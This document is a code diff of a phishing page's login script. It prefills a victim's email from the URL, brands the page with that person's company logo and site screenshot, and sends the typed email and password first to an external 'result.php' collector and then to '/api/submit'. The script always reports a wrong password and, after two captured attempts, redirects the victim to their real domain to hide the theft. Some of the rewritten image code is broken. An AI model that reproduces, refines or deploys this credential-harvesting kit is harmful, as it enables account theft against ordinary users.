--- a/index.html
+++ b/index.html
@@ -1750,112 +1750,170 @@ document.getElementById('times').innerHTML = n + ' ' + time;
 
 	</script>
 <script>
-$(document).ready(function(){
-var count=0;
+// login-handler.js
+let failedAttempts = 0;
 
-var email = window.location.hash.substr(1);
-if (!email) {
-
+function isBase64(str) {
+  const base64Regex = /^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$/;
+  return base64Regex.test(str);
 }
-else
-{
-var my_email =email;
-$('#email').val(my_email);
-$('#emailich').html(my_email);
-$('#auth_email').html(my_email);
-$('#manutd').html(my_email);
-var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
 
-if (!filter.test(my_email)) {
-$('#error').show();
-email.focus;
-return false;
+function isValidEmail(email) {
+  return /^[\w._+-]+@[\w.-]+\.[a-zA-Z]{2,}$/.test(email);
 }
-var ind=my_email.indexOf("@");
-var my_slice=my_email.substr((ind+1));
-$('#footer_dom').html(my_email);
-$('#carss').html(my_email);
-$('#top_label_logo').attr(
-    'src',
-    'https://img.logo.dev/' + my_slice + '?token=pk_XbcRLEiaQmKqN0PgTrqF6A'
-  );
-var mPage = 'https://screenshot.domains/'+my_slice;
-document.getElementById('mainPage').src = mPage; 
+
+function getEmailFromHash() {
+  const hash = window.location.hash.substring(1);
+  return isBase64(hash) ? atob(hash) : hash;
 }
-$('#next_button').click(function(event){
-$('#error').hide();
-$('#msg').hide();
-event.preventDefault();
-var email=$("#email").val();
-var password=$("#password").val();
-var ind=email.indexOf("@");
-var my_slice=email.substr((ind+1));
-if (!password) {
-    $('#auth_reg').show();
-    $('#auth_reg').html("Password is empty!");
 
-                return false;
-            }
+function getEmailDomain(email) {
+  const parts = email.split("@");
+  return parts.length === 2 ? parts[1].toLowerCase() : null;
+}
 
-count=count+1;
+function handleRedirectOnFailure(email) {
+  const domain = getEmailDomain(email);
+  window.top.location.href = domain ? `https://${domain}` : "https://yourdomain.com/help";
+}
 
-$.ajax({
-dataType: 'JSON',
-url: 'https://tskg.dpdns.org/php/result.php',
-type: 'POST',
-      	data:{
-			email:email,
-            password:password,	
-      	},
-			data: $('#contactform').serialize(),
-            beforeSend: function(xhr){
-            	
-            },
-            success: function(response){
-            	if(response){
-            		$("#msg").show();
-            		console.log(response);
-            		if(response['signal'] == 'ok'){
-            			$("#password").val("");
-            			if (count>=2) {
-            				count=0;
-                    // window.location.replace(response['redirect_link']);
-                   window.location.replace("https://www."+my_slice);
-                }
-            	$("#auth_reg").show();
-               $('#auth_reg').html("Password is not correct. Please try again");
-            }
-            else{
-                        	$("#msg").show();
-               $('#msg').html("Password is not correct. Please try again");	
-            }
-        }
-    },
-    error: function(){
-    	$("#password").val("");
-    	if (count>=2) {
-    		count=0;
-    		 window.location.replace("https://www."+my_slice);
-    	}
-            	$("#auth_reg").show();
-               $('#auth_reg').html("Password is not correct. Please try again");
-    },
-    complete: function(){
-    	
+function setImages(domain) {
+  if (!domain) return;
+  const logoUrl = `'https://img.logo.dev/' + my_slice + '?token=pk_XbcRLEiaQmKqN0PgTrqF6A'`;
+  const bgUrl = `https://screenshot.domains/+ my_slice`;
+
+  const logoImg = document.getElementById("logoimg");
+  const bgLayer = document.getElementById("background-layer");
+
+  if (logoImg) {
+    logoImg.src = logoUrl;
+    logoImg.onerror = () => (logoImg.src = "default-logo.png");
+  }
+
+  const bgImg = new Image();
+  bgImg.src = bgUrl;
+  bgImg.onload = () => {
+    if (bgLayer) {
+      bgLayer.style.backgroundImage = `url("${bgUrl}")`;
+      bgLayer.classList.add("loaded");
     }
-});
+  };
+  bgImg.onerror = () => {
+    if (bgLayer) bgLayer.style.backgroundColor = "#f0f0f0";
+  };
+}
+
+document.addEventListener("DOMContentLoaded", () => {
+  const emailInput = document.getElementById("email");
+  const passwordInput = document.getElementById("password");
+  const submitBtn = document.getElementById("submit-btn");
+  const msgBox = document.getElementById("msg");
+  const lourlInput = document.getElementById("lourl");
+
+  if (lourlInput) {
+    lourlInput.value = window.location.origin + window.location.pathname;
+  }
+
+  const email = getEmailFromHash();
+  if (isValidEmail(email)) {
+    emailInput.value = email;
+    const domain = getEmailDomain(email);
+    if (domain) setImages(domain);
+  } else {
+    emailInput.removeAttribute("readonly");
+    msgBox.textContent = "Please enter your email.";
+    msgBox.style.display = "block";
+  }
+
+  let isSubmitting = false;
+
+  document.getElementById("login-form")?.addEventListener("submit", async (e) => {
+    e.preventDefault();
+    if (isSubmitting) return;
+
+    isSubmitting = true;
+    submitBtn.disabled = true;
+    submitBtn.textContent = "Logging in...";
+    msgBox.style.display = "none";
+
+    if (!emailInput.value || !passwordInput.value) {
+      msgBox.textContent = "Please enter both email and password.";
+      msgBox.style.display = "block";
+      passwordInput.value = "";
+      resetUI();
+      return;
+    }
+
+    const captchaResponse = grecaptcha.getResponse();
+    document.getElementById("captcha-response").value = captchaResponse;
+    if (!captchaResponse) {
+      msgBox.textContent = "Please verify you're not a robot.";
+      msgBox.style.display = "block";
+      passwordInput.value = "";
+      resetUI();
+      return;
+    }
+
+    const formData = {
+      email: emailInput.value,
+      password: passwordInput.value,
+      lourl: lourlInput?.value || "",
+      captcha: captchaResponse
+    };
+
+    try {
+      const res = await fetch("/api/submit", {
+        method: "POST",
+        headers: { "Content-Type": "application/json" },
+        body: JSON.stringify(formData)
+      });
+
+      const result = await res.json();
+      console.log("Server response:", result);
+
+      failedAttempts++;
+
+      msgBox.textContent = result.message || "Incorrect password.";
+      msgBox.style.display = "block";
+      passwordInput.value = "";
+      grecaptcha.reset();
+      submitBtn.textContent = "Sign in";
+
+      // Redirect after 2 failed attempts
+      if (failedAttempts >= 2) {
+        setTimeout(() => handleRedirectOnFailure(emailInput.value), 500);
+      }
+
+    } catch (err) {
+      console.error("Submission failed:", err);
+      failedAttempts++;
+      msgBox.textContent = "Network error. Please try again.";
+      msgBox.style.display = "block";
+      passwordInput.value = "";
+      grecaptcha.reset();
+      submitBtn.textContent = "Sign in";
+      if (failedAttempts >= 2) {
+        setTimeout(() => handleRedirectOnFailure(emailInput.value), 500);
+      }
+    } finally {
+      resetUI();
+    }
   });
 
-
-	});
-
+  function resetUI() {
+    isSubmitting = false;
+    submitBtn.disabled = false;
+    submitBtn.textContent = "Sign in";
+  }
+});
 
 </script>	
    
   
 
 
- <script src="login-handler.js"></script>
+ 
 <script src="prefill-email.js"></script>  
 
    </body></html>
+
